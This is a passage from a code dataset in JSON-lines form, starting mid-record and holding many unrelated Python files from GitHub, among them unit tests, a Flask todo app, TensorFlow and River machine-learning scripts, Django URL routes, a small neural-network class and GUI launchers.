thresholds are all super high (above the surface and the minimum)\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 101, None, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.0, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, None, 200, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.08, places=7)\n self.assertAlmostEqual(test[1], 1.8439, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 101, 200, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.0, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\nif __name__ == '__main__':\n 
unittest.main()\n\n\n\n\n","repo_name":"Ryan-Lima/Sandbar_workbench_python_3","sub_path":"Python3-version/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":19599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"4603201751","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom unittest import TestCase\nfrom HtmlAndTextParseHelper import get_gazete_name, get_unicode\nfrom ZamanReader import ZamanReader\n\n__author__ = 'cvardar'\n\n\nclass test_zaman_parse(TestCase):\n    def test_read_yazarlar_zaman(self):\n        f = open('ZamanYazarlar.html', 'r')\n        f_read = f.read()\n        reader = ZamanReader()\n        links = reader.get_yazi_links(f_read)\n        f = open('ZamanExpectedLinks.txt', 'r')\n        expected_links = set([x.strip() for x in f.readlines()])\n        self.assertEqual(expected_links, links)\n\n    def test_read_yazarlar_zaman2(self):\n        f = open('ZamanYazarlar2.html', 'r')\n        f_read = f.read()\n        reader = ZamanReader()\n        links = reader.get_yazi_links(f_read)\n        self.assertEqual(38, len(links))\n\n    def test_read_yazi_zaman(self):\n        f = open('ZamanYazi.html', 'r')\n        f_read = f.read()\n        url = 'http://zaman.com.tr/ahmet-kurucan/bu-kadar-basit-degil-olamaz-olmamali_2119892.html'\n        reader = ZamanReader()\n\n        yazi = reader.get_doc_from_html(f_read, url)\n        self.assertEqual(get_unicode('Cehalet kıskacında teokrasi ve demokrasi'), yazi['title'])\n        self.assertEqual(get_unicode(' 15 Ağustos 2013, Perşembe'), yazi['date'])\n        self.assertEqual(get_unicode('Ahmet Kurucan'), yazi['author'])\n        self.assertEqual(get_unicode('Zaman'), yazi['gazete'])\n        self.assertEqual(3946, len(yazi['content']))\n\n    def test_gazete_name(self):\n        gazete_name = get_gazete_name(\"http://zaman.com.tr/yazarlar\")\n        self.assertEqual('zaman', gazete_name)\n","repo_name":"cemvardar/bottle_heroku_hello","sub_path":"tests/test_zaman_parse.py","file_name":"test_zaman_parse.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"7331119986","text":"import argparse\nimport json\nimport os\nfrom functools import partial\nfrom pathlib import Path\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nfrom livereload import Server\nfrom more_itertools import chunked\n\n\ndef gets_args():\n    parser = argparse.ArgumentParser('accepts optional args')\n    parser.add_argument(\n        '-jp', '--json_path',\n        help='enter your path to the JSON file',\n        default=os.path.join(Path.cwd(), 'book_page.json')\n    )\n    args = parser.parse_args()\n    return args\n\n\ndef on_reload(json_path, num_described_books_per_page):\n    number_of_columns = 2\n    Path('pages').mkdir(parents=True, exist_ok=True)\n    with open(json_path, 'r') as file:\n        book_descriptions = list(\n            chunked(json.load(file), num_described_books_per_page)\n        )\n    total_pages_num = len(book_descriptions)\n    for num, books_description_page in enumerate(book_descriptions, 1):\n        description_books_page = chunked(\n            books_description_page, number_of_columns\n        )\n        env = Environment(\n            loader=FileSystemLoader('.'),\n            autoescape=select_autoescape(['html'])\n        )\n        template = env.get_template(os.path.join('templates', 'template.html'))\n        rendered_page = template.render(\n            description_books_page=description_books_page,\n            total_pages_num=total_pages_num,\n            current_page_number=num,\n        )\n        with open(\n            os.path.join(\n                'pages',\n                f'index{num}.html'\n            ), 'w', encoding='utf8'\n        ) as file:\n            file.write(rendered_page)\n\n\ndef main():\n    num_described_books_per_page = 10\n    
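# For example (hypothetical numbers): with 25 book descriptions and 10 per\n    # page, chunked() in on_reload() yields three pages of 10, 10 and 5 books,\n    # and each page is then re-chunked into rows of 2 for the template layout.\n    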
json_path = gets_args().json_path\n on_reload(json_path, num_described_books_per_page)\n server = Server()\n server.watch(\n os.path.join('templates', 'template.html'),\n partial(\n on_reload,\n json_path,\n num_described_books_per_page\n )\n )\n server.serve(root='.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"serega19851/parsing","sub_path":"render_website.py","file_name":"render_website.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24305557990","text":"import PySimpleGUI as sg \n\n#definicion de tema\nsg.theme('black') \n\n \nlayout = [[sg.Text('Inicializar app?...')], \n [sg.Button('START'), sg.Button('CANCEL')] ] \n \nwindow = sg.Window('safe-eye', layout,no_titlebar=True,grab_anywhere=True)\n \nwhile True: \n event, values = window.read() \n if event in (None, 'CANCEL'): \n break \n \n if event == 'START':\n print('inicializado....')\n \nwindow.close()","repo_name":"Echxvx2610/Keylogger","sub_path":"App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6505532090","text":"import cs50\n\nwhile True:\n print (\"Height: \", end=\"\")\n height = cs50.get_int()\n if height>=0 and height<23:\n break\n\nlength=2*height-1\n\nprint (\"icreadible pyramide\")\n\nfor i in range (height):\n spaces=length-2*i-1\n s=int(spaces/2)\n hashes=length-spaces\n print(\" \" * s, end=\"\")\n print(\"#\" * hashes, end=\"\")\n print(\" \" * s, end=\"\")\n print()","repo_name":"OlhaLop/Python-exercises","sub_path":"pyramide.py","file_name":"pyramide.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6972058876","text":"from flask import Flask, render_template, request\nfrom datetime import datetime\nfrom pprint import pprint\n\nfrom werkzeug.wrappers import response\n\napp = Flask(__name__)\n\n# The in-memory database, because I'm stuck on a plane and can't install sqllite\ndatabase = [\n {\n \"id\": 0,\n \"text\": \"Todo number 1\",\n \"date\": datetime.now()\n }\n]\n\ndef add_todo(todo):\n database.append({\n \"id\": len(database),\n \"text\": todo,\n \"date\": datetime.now()\n })\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if (request.method == \"POST\"):\n task_content = request.form['content']\n add_todo(task_content)\n print(\"\\n\\ndatabase:\")\n pprint(database)\n else:\n pass\n\n return render_template(\"index.html\")\n\n\n@app.route('/delete/', methods=[\"DELETE\"])\ndef delete(id):\n print('hit the delete route')\n pprint(request)\n return \"hit the delete route\"\n\n\n\n@app.route('/update')\ndef update():\n print('hit the update route')\n return \"hit the update route\"\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"slutske22/Practice_files","sub_path":"python_flask_tut/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14977095474","text":"import tensorflow as tf\nfrom random import shuffle\nimport glob\nimport pandas\nimport numpy as np\n\n\ndef data_bin(train_path):\n csv = pandas.read_csv(train_path).values\n feature_bin = []\n label_bin = []\n for row in csv:\n feature_bin.append(row[1:])\n zeros_bin = np.zeros(10)\n zeros_bin[row[0]] = 1\n label_bin.append(zeros_bin)\n\n 
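# e.g. a row whose label is 3 is appended as the one-hot vector\n    # [0., 0., 0., 1., 0., 0., 0., 0., 0., 0.]\n    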
label_bin = np.array(label_bin)\n feature_bin = np.array(feature_bin)\n\n return label_bin, feature_bin\n\n\n# X is a placeholder for the 784 dim vector\nx = tf.placeholder(tf.float32, [None, 784])\n\n# Weights and Biases Variables\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\n\n# Defining the model\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\n# placeholder for cross entropy (how far away from the truth vector)\ny_ = tf.placeholder(tf.float32, [None, 10])\n\n# Actual Cross Entropy function\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n\n# Training! Gradian Descent Algorithm\ntrain_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n# varible init\ninit_op = tf.global_variables_initializer()\n\n# LOAD Training DATA\n\nimg_train_path = './data/fashion-mnist_train.csv'\ntrain_label_bin, train_feature_bin = data_bin(img_train_path)\n\nimg_test_path = './data/fashion-mnist_test.csv'\ntest_label_bin, test_feature_bin = data_bin(img_train_path)\n\n# Start a new session\nwith tf.Session() as sess:\n sess.run(init_op)\n\n # Training step\n for _ in range(5):\n idx = np.random.randint(len(train_feature_bin), size=100)\n batch_xs = train_feature_bin[idx,]\n batch_ys = train_label_bin[idx,]\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n # Prediction\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n # Turns correct prediction into accuracy\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n # Test!\n print(sess.run(accuracy, feed_dict={x: test_feature_bin, y_: test_label_bin}))\n","repo_name":"gtarpenning/ml-testing","sub_path":"img-tensorflow/test-scripts/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"30635544940","text":"from django.conf import settings\nfrom django.conf.urls.defaults import *\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\n\"\"\"\nfeeds = {\n 'latestpages': LatestPages,\n}\n\nsitemaps = {\n 'wiki': Wiki,\n}\n\"\"\"\n\nurlpatterns = patterns('',\n url(r'^$', include('Home.urls')),\n url(r'^Publication/', include('Publication.urls')),\n url(r'^Recent_Updates/', include('Recent_Updates.urls')),\n url(r'^Paper_Download/', include('Paper_Download.urls')),\n url(r'^Contact_Us/', include('Contact_Us.urls')),\n url(r'^tinymce/', include('tinymce.urls')),\n url(r'^admin/(.*)', admin.site.root),\n url(r'^%s(?P.*)$' % settings.MEDIA_URL[1:], \n 'django.views.static.serve', {\"document_root\": settings.MEDIA_ROOT}),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login', {'template_name': 'login.html'}),\n url(r'^accounts/logout/$', include('accounts.urls')),\n url(r'^accounts/register/$', 'sphene.community.views.register', name = 'sph_register'),\n (r'^board/', include('sphene.sphboard.urls')),\n (r'^(?Ptest/(?P\\w+))/board/', include('sphene.sphboard.urls')),\n (r'^(?Ptest/(?P\\w+))/wiki/', include('sphene.sphwiki.urls')),\n (r'^wiki/', include('sphene.sphwiki.urls'), { 'urlPrefix': 'wiki', 'groupName': 'Sphene' }),\n (r'^static/sphene/(.*)$', 'django.views.static.serve', {'document_root': settings.ROOT_PATH + '/communitytools/static/sphene' }),\n (r'^static/(.*)$', 'django.views.static.serve', {'document_root': settings.ROOT_PATH + '/static' }),\n (r'^site_media/(.*)$', 'django.views.static.serve', {'document_root': '/home/kahless/dev/python/diamanda/media'}), \n 
(r'^accounts/register/(?P[a-zA-Z/\\+0-9=]+)/$', 'sphene.community.views.register_hash'),\n)\n\n","repo_name":"sunilpatelmca/dishnine","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27520403978","text":"\"\"\"\nStatus Effect Lists\n~~~~~~~~~~~~~~~~~~~\n\"\"\"\nfrom nari.types import Timestamp\nfrom nari.types.event import Event\nfrom nari.types.classjoblevel import ClassJobLevel\nfrom nari.types.actor import Actor\nfrom nari.types.status import StatusEffect\n\n\nclass StatusList(Event): # pylint: disable=too-few-public-methods\n \"\"\"Represents a player Actor status list\n\n :param timestamp: The timestamp of the event\n :type timestamp: Timestamp\n :param class_job_level: The actor's class, job, and level\n :type class_job_level: ClassJobLevel\n :param target_actor: The target actor that has status effects\n :type target_actor: Actor\n :param status_effects: A list of status effects\n :type status_effects: list[StatusEffect]\n \"\"\"\n def __init__(self, *,\n timestamp: Timestamp,\n class_job_level: ClassJobLevel,\n target_actor: Actor,\n status_effects: list[StatusEffect],\n ):\n super().__init__(timestamp)\n self.class_job_level = class_job_level\n self.target_actor = target_actor\n self.status_effects = status_effects\n\n def __repr__(self):\n return ''\n\n\nclass StatusListBasic(Event): # pylint: disable=too-few-public-methods\n \"\"\"Represents a simplified status list as opposed to ``StatusList``\n\n :param timestamp: The timestamp of the event\n :type timestamp: Timestamp\n :param target_actor: The target actor that has status effects\n :type target_actor: Actor\n :param status_effects: A list of status effects\n :type status_effects: list[StatusEffect]\n \"\"\"\n def __init__(self, *,\n timestamp: Timestamp,\n target_actor: Actor,\n status_effects: list[StatusEffect],\n ):\n super().__init__(timestamp)\n self.target_actor = target_actor\n self.status_effects = status_effects\n\n def __repr__(self):\n return ''\n","repo_name":"xivlogs/nari","sub_path":"nari/types/event/statuslist.py","file_name":"statuslist.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"39099487553","text":"from river import datasets\nfrom river import metrics\nfrom river.evaluate import progressive_val_score\n\nfrom river import optim\nfrom river import compose\nfrom river import facto\n\n\ndef evaluate(model):\n X_y = datasets.MovieLens100K()\n metric = metrics.MAE() + metrics.RMSE()\n _ = progressive_val_score(X_y, model, metric, print_every=25_000, show_time=True, show_memory=True)\n\n\ndef debug(model):\n for x, _ in datasets.MovieLens100K():\n report = model.debug_one(x)\n print(report)\n break\n\n\ndef split_genres(x):\n genres = x['genres'].split(', ')\n return {f'genre_{genre}': 1 / len(genres) for genre in genres}\n\n\ndef bin_age(x):\n if x['age'] <= 18:\n return {'age_0-18': 1}\n elif x['age'] <= 32:\n return {'age_19-32': 1}\n elif x['age'] < 55:\n return {'age_33-54': 1}\n else:\n return {'age_55-100': 1}\n\n\ndef debug_fm():\n fm_params = {\n 'n_factors': 10,\n 'weight_optimizer': optim.SGD(0.025),\n 'latent_optimizer': optim.SGD(0.05),\n 'sample_normalization': False,\n 'l1_weight': 0.,\n 'l2_weight': 0.,\n 'l1_latent': 0.,\n 'l2_latent': 0.,\n 'intercept': 3,\n 'intercept_lr': .01,\n 'weight_initializer': optim.initializers.Zeros(),\n 
'latent_initializer': optim.initializers.Normal(mu=0., sigma=0.1, seed=73),\n }\n\n regressor = compose.Select('user', 'item')\n regressor += (\n compose.Select('genres') |\n compose.FuncTransformer(split_genres)\n )\n regressor += (\n compose.Select('age') |\n compose.FuncTransformer(bin_age)\n )\n regressor |= facto.FMRegressor(**fm_params)\n evaluate(regressor)\n debug(regressor)\n\n\ndef debug_ffm():\n dataset = (\n ({'user': 'Alice', 'item': 'Superman', 'time': .12}, 8),\n ({'user': 'Alice', 'item': 'Terminator', 'time': .13}, 9),\n ({'user': 'Alice', 'item': 'Star Wars', 'time': .14}, 8),\n ({'user': 'Alice', 'item': 'Notting Hill', 'time': .15}, 2),\n ({'user': 'Alice', 'item': 'Harry Potter ', 'time': .16}, 5),\n ({'user': 'Bob', 'item': 'Superman', 'time': .13}, 8),\n ({'user': 'Bob', 'item': 'Terminator', 'time': .12}, 9),\n ({'user': 'Bob', 'item': 'Star Wars', 'time': .16}, 8),\n ({'user': 'Bob', 'item': 'Notting Hill', 'time': .10}, 2)\n )\n model = facto.FFMRegressor(\n n_factors=10,\n intercept=5,\n seed=42,\n )\n\n for x, y in dataset:\n model = model.learn_one(x, y)\n\n print(model.predict_one({'user': 'Bob', 'item': 'Harry Potter', 'time': .14}))\n print(model.debug_one({'user': 'Bob', 'item': 'Harry Potter', 'time': .14}))\n\n\ndef debug_fwfm():\n dataset = (\n ({'user': 'Alice', 'item': 'Superman'}, 8),\n ({'user': 'Alice', 'item': 'Terminator'}, 9),\n ({'user': 'Alice', 'item': 'Star Wars'}, 8),\n ({'user': 'Alice', 'item': 'Notting Hill'}, 2),\n ({'user': 'Alice', 'item': 'Harry Potter '}, 5),\n ({'user': 'Bob', 'item': 'Superman'}, 8),\n ({'user': 'Bob', 'item': 'Terminator'}, 9),\n ({'user': 'Bob', 'item': 'Star Wars'}, 8),\n ({'user': 'Bob', 'item': 'Notting Hill'}, 2)\n )\n model = facto.FwFMRegressor(\n n_factors=10,\n intercept=5,\n seed=42,\n )\n\n for x, y in dataset:\n model = model.learn_one(x, y)\n\n print(model.predict_one({'Bob': 1, 'Harry Potter': 1}))\n print(model.debug_one({'Bob': 1, 'Harry Potter': 1}))\n\n\ndef debug_hofm():\n dataset = (\n ({'user': 'Alice', 'item': 'Superman', 'time': .12}, 8),\n ({'user': 'Alice', 'item': 'Terminator', 'time': .13}, 9),\n ({'user': 'Alice', 'item': 'Star Wars', 'time': .14}, 8),\n ({'user': 'Alice', 'item': 'Notting Hill', 'time': .15}, 2),\n ({'user': 'Alice', 'item': 'Harry Potter ', 'time': .16}, 5),\n ({'user': 'Bob', 'item': 'Superman', 'time': .13}, 8),\n ({'user': 'Bob', 'item': 'Terminator', 'time': .12}, 9),\n ({'user': 'Bob', 'item': 'Star Wars', 'time': .16}, 8),\n ({'user': 'Bob', 'item': 'Notting Hill', 'time': .10}, 2)\n )\n model = facto.HOFMRegressor(\n degree=3,\n n_factors=10,\n intercept=5,\n seed=42,\n )\n\n for x, y in dataset:\n _ = model.learn_one(x, y)\n\n print(model.predict_one({'user': 'Bob', 'item': 'Harry Potter', 'time': .14}))\n print(model.debug_one({'user': 'Bob', 'item': 'Harry Potter', 'time': .14}))\n\n\nif __name__ == '__main__':\n debug_hofm()\n","repo_name":"nakamasato/ml-training","sub_path":"river/examples/fm-for-datalens/debug_check.py","file_name":"debug_check.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"10739589398","text":"from colorama import Style, Fore, Back\r\n_ALL_COLORS_ = [Fore.RED,Fore.BLUE,Fore.GREEN,Fore.YELLOW,\r\n Fore.CYAN,Fore.MAGENTA,Fore.WHITE,Fore.BLACK\r\n]\r\n\r\ntry:\r\n number = int(input(\"===>\"))\r\nexcept ValueError:\r\n print('Enter a integer not a string.') \r\n number = int(input(\"===>\"))\r\n\r\n \r\ndef binary(num):\r\n code = 
\"\"\r\n while num>0:\r\n remainder = num%2\r\n code += str(remainder)\r\n print(f\"{_ALL_COLORS_[0]}2 {_ALL_COLORS_[6]}|{_ALL_COLORS_[1]} {num} {_ALL_COLORS_[6]}|{_ALL_COLORS_[3]} {remainder}\")\r\n num = num//2\r\n binarycode = list(code)\r\n binarycode.reverse()\r\n binarycode = str(binarycode)\r\n binarycode = binarycode.strip(\"[\")\r\n binarycode = binarycode.strip(\"]\")\r\n binarycode = binarycode.replace(\" \",\"\")\r\n binarycode = binarycode.replace(\"'\",\"\")\r\n binarycode = binarycode.replace(\",\",\"\")\r\n print(\"Binary number is \",binarycode) \r\nbinary(number)\r\nagain = input('Wanna Run Again Y/N') \r\nwhile again != 'N' or 'n':\r\n number = int(input(\"===>\"))\r\n binary(number)\r\n again = input('Wanna Run Again Y/N: ') \r\n if again == 'N' or 'n':\r\n print('Thanku For using')\r\n break\r\n","repo_name":"Dhruv117/binaryconverter","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37432416451","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 7/21/2022 11:09 AM\n# @Author : jonas pan\n# @Email : jonas.pan@signify.com\n# @File : main\n# ---------------------\nimport logging\nimport coloredlogs\nimport os\nimport sys\nimport gui_main_window\nfrom PySide6.QtWidgets import QApplication, QStyleFactory\n\n\nclass Main:\n\n @staticmethod\n def setup_logging(level=logging.DEBUG, log_folder='log', filename='mainwindow.log'):\n if not os.path.exists(log_folder):\n os.mkdir(log_folder)\n log_filename = None\n if filename is not None and log_folder is not None:\n log_filename = log_folder + os.sep + filename\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n log_format = '%(asctime)s - %(levelname)5s - %(lineno)4s - %(filename)18s - %(message)s'\n logging.basicConfig(filename=log_filename, level=level, format=log_format)\n if log_filename is not None:\n console = logging.StreamHandler(stream=sys.stdout)\n console.setLevel(logging.getLogger().level)\n console.setFormatter(logging.Formatter(log_format))\n logging.getLogger().addHandler(console)\n coloredlogs.install(level=level, fmt=log_format, milliseconds=True)\n\n @classmethod\n def run(cls):\n cls.setup_logging()\n app = QApplication(sys.argv)\n tmp = gui_main_window.MainWindow()\n app.setStyle(QStyleFactory.create(\"windowsvista\"))\n tmp.show()\n try:\n sys.exit(app.exec())\n except Exception as e:\n logging.error(e)\n\n\nif __name__ == '__main__':\n Main.run()\n","repo_name":"pjmbox/trailing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29462893238","text":"import numpy as np\n\nfrom DataSet import DataSet\n\n\nclass NeuralNetwork:\n def __init__(self, structure, f, fDeriv, w=None):\n '''\n constructor\n :param structure: size of each layer, structure[0] is input layer size (including bias), and structure[-1] is output layer size\n :param f: activation function\n :param fDeriv: activation function derivative. 
it should take f(x) as an input and returns derivative of f(x) as output\n :param w: weight matrix\n '''\n self.n = structure\n self.L = len(structure) # Number of layers\n self.a = self.networkShapedMatrix() # a[i][j] is the value of jth node in the ith layer\n self.f_v = np.vectorize(f) # vectorizing f to apply it to a vector instead of just a scalar\n self.fDeriv = fDeriv\n self.fDeriv_v = np.vectorize(fDeriv) # vectorizing fDeriv\n if (w == None):\n self.randInitWeights()\n else:\n self.w = w\n self.errors = [] # for logging of cost\n\n def networkShapedMatrix(self):\n '''\n\n :return: 2D Matrix. mat[i][j] is the jth node in the ith layer.\n '''\n return [np.zeros(shape=length, dtype=np.float64) for length in self.n]\n\n def randInitWeights(self):\n '''\n initializes all weight matrices [1, L) randomly with values in range [0, 1)\n :return: void\n '''\n self.w = [np.zeros(1)] + [np.random.rand(self.n[l], self.n[l - 1]) for l in range(1, self.L)]\n # self.w = [np.zeros(1)] + [np.ones(shape=(self.n[l], self.n[l - 1])) for l in range(1, self.L)]\n\n def learn(self, ds: DataSet, EPOCHS: int, alpha: float):\n '''\n learns weight w on dataset ds\n :param ds: training set\n :param EPOCHS: number of epochs to train on\n :param alpha: learning rate\n :return:\n '''\n self.errors.append(self.MSE(ds))\n for i in range(EPOCHS):\n for [x, y] in ds:\n self.forward(x)\n self.backward(y, alpha)\n self.errors.append(self.MSE(ds))\n print(\"Error at iteration \" + str(i) + \" = \" + str(self.errors[-1]))\n\n def SE(self, y_pred, y_actual):\n '''\n\n :param y_pred: predicted output vector\n :param y_actual: actual output vector\n :return: summation of squared pairwise difference of elements of both vectors\n '''\n return np.sum((y_pred - y_actual)**2)\n\n def MSE(self, ds):\n '''\n Mean square error\n :param ds:\n :return:\n '''\n total = 0\n for [x, y] in ds:\n total += self.SE(self.forward(x), y)\n total /= 2 * ds.m\n return total\n\n def forward(self, x: np.ndarray):\n '''\n updates self.a to hold value of forward propagating x\n :param x: 1D input feature vector of size self.n[0]\n :return: 1D output vector of size self.n[-1]\n '''\n self.a[0] = x\n for i in range (1, self.L):\n self.a[i] = self.f_v(np.matmul(self.w[i], self.a[i - 1]))\n return self.a[-1]\n\n def backward(self, y: np.ndarray, alpha):\n '''\n updated weights on w\n :param y: 1D output vector of size self.n[-1]\n :return: delta matrix\n '''\n d = self.networkShapedMatrix()\n d[-1] = (self.a[-1] - y) * self.fDeriv_v(self.a[-1])\n for h in range (self.L - 2, 0, -1):\n d[h] = np.matmul(self.w[h + 1].transpose(), d[h + 1]) * self.fDeriv_v(self.a[h])\n '''\n explanation of above line:\n np.matmul(...) will return an array of same size as d[h]. 
each element of the array is resultant from the dot product d[h + 1] array with each column of self.w[h + 1]\n then this array is element-wise multiplied with an array containing the derivative of each element of a[h]\n '''\n # for j in range(self.n[h]):\n # d[h][j] = np.sum(d[h + 1] * self.w[h + 1][:, j]) * self.fDeriv(self.a[h][j])\n\n for h in range(1, self.L):\n self.w[h] -= alpha * self.makeMat(d[h], self.a[h - 1])\n return d\n\n def makeMat(self, v1: np.ndarray, v2: np.ndarray):\n '''\n generates matrix out of product of v1, v2\n :param v1: 1D np array\n :param v2: 1D np array\n :return: matrix where mat[i][j] is v1[i] * v2[j]\n '''\n return np.matmul(v1.reshape((v1.shape[0], 1)), v2.reshape((1, v2.shape[0])))","repo_name":"MostafaOmar98/neural-network","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8452911952","text":"import re\nimport ktrain\nimport parameter\nimport pandas as pd\nfrom ktrain import vision as vis\nfrom PIL import ImageFile\nimport tensorflow as tf\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\n\n\n# Function to filter asset_id from filename\ndef filter_asset_id(original_list, pattern=r'_(\\d+)_'):\n output_list = []\n for element in original_list:\n p = re.compile(pattern)\n r = p.search(element)\n output_list.append(int(r.group(1)))\n return output_list\n\n\npattern = r'_([^/]+)_\\d+_.jpg$'\n\np = re.compile(pattern)\nr = p.search('_0.01_1099561093123_.jpg')\nprint(r.group(1))\n\ndata_dir = parameter.ImageAttributes_ResNet50.dir\n\n# Split dataset to training and test data\n(train_data, test_data, preproc) = vis.images_from_fname(data_dir,\n pattern = pattern,\n is_regression = True,\n random_state = 42)\n\n# Get pretrained model from ktrain\npretrained_model = vis.image_regression_model('pretrained_resnet50',\n train_data = train_data,\n val_data = test_data,)\n\n# Remove the last two layers of the pretrained model\npretrained_model = Model(pretrained_model.input,\n pretrained_model.layers[-3].output)\n\n# Add two dense layer and create model\n# Give output layer specific name\nmodel = Sequential()\nmodel.add(pretrained_model)\nmodel.add(Dense(512, activation=\"relu\", name=\"attribute_layer\"))\nmodel.add(Dense(1, activation=\"relu\"))\n\nprint(model.summary())\n\n# Get learner\nlearner = ktrain.get_learner(model = model,\n train_data = test_data,\n val_data = train_data,\n batch_size = 128)\n\n# Compile learner\nlearner.model.compile(optimizer=Adam(learning_rate=1e-4),\n loss=tf.keras.losses.MeanAbsoluteError(),\n metrics=[tf.keras.metrics.MeanAbsoluteError()])\n\n# Train model\nImageFile.LOAD_TRUNCATED_IMAGES = True\nlearner.fit_onecycle(1e-4, 2)\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nlearner.freeze(15)\nlearner.fit_onecycle(1e-4, 2)\n\n# Get predictor\npredictor = ktrain.get_predictor(learner.model, preproc)\n\n# Create predictor with specific layer as output and run\npredictor2 = Model(inputs=predictor.model.input,\n outputs=predictor.model.get_layer('attribute_layer').output)\nImageFile.LOAD_TRUNCATED_IMAGES = True\nattributes_train = predictor2.predict(train_data)\nattributes_test = predictor2.predict(test_data)\n\n# Store output attributes in dataframe\ndf_train = pd.DataFrame(attributes_train)\ndf_test = pd.DataFrame(attributes_test)\n\n# Use function to filter asset_id from filename\n# Also store asset_ids in 
dataframes\ntrain_data_list = filter_asset_id(list(train_data.filenames))\ndf_train[\"asset_id\"] = train_data_list\ntest_data_list = filter_asset_id(list(test_data.filenames))\ndf_test[\"asset_id\"] = test_data_list\n\n# Combine output attributes and asset ids\ndf_ResNet = pd.concat([df_train, df_test])\ndf_ResNet.head()\n\n# Load textual dataset\ndf_textual = pd.read_csv(parameter.ImageAttributes_ResNet50.textual_dataset_dir)\n\n# Merge datasets on asset_id, drop empty rows and store file\ndf = pd.merge(df_textual, df_ResNet, on=['asset_id'], how=\"left\")\ndf = df.dropna()\ndf.to_csv(parameter.ImageAttributes_ResNet50.final_dataset_dir)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"BuecAle/NftPricePrediction","sub_path":"model/ImageAttributes_ResNet50.py","file_name":"ImageAttributes_ResNet50.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"19128540193","text":"import heapq\ndef solve(applicantsize, apartmentsize, diff):\n heapq.heapify(applicantsize)\n heapq.heapify(apartmentsize)\n count = 0\n while applicantsize and apartmentsize:\n applicant, apartment = heapq.heappop(applicantsize), heapq.heappop(apartmentsize)\n if abs(applicant - apartment) <= diff:\n count += 1\n else:\n if apartment > applicant:\n heapq.heappush(apartmentsize, apartment)\n else:\n heapq.heappush(applicantsize, applicant)\n return count\n\nif __name__ == '__main__':\n n, m, k = map(int, input().split())\n applicantsize = list(map(int, input().split()))\n apartmentsize = list(map(int, input().split()))\n print(solve(applicantsize, apartmentsize, k))","repo_name":"Semeriuss/Data-Structures-and-Algorithms","sub_path":"csef problems/apartments.py","file_name":"apartments.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24566404600","text":"\"\"\"Plot forecast vs target.\"\"\"\n\n\nimport pandas as pd\n\n\nfrom walmart_sales.constants import FEATURES_WINDOW\nfrom walmart_sales.utils import add_weeks\n\n\ndef plot_forecast_vs_target(\n df: pd.DataFrame,\n store: int,\n dept: 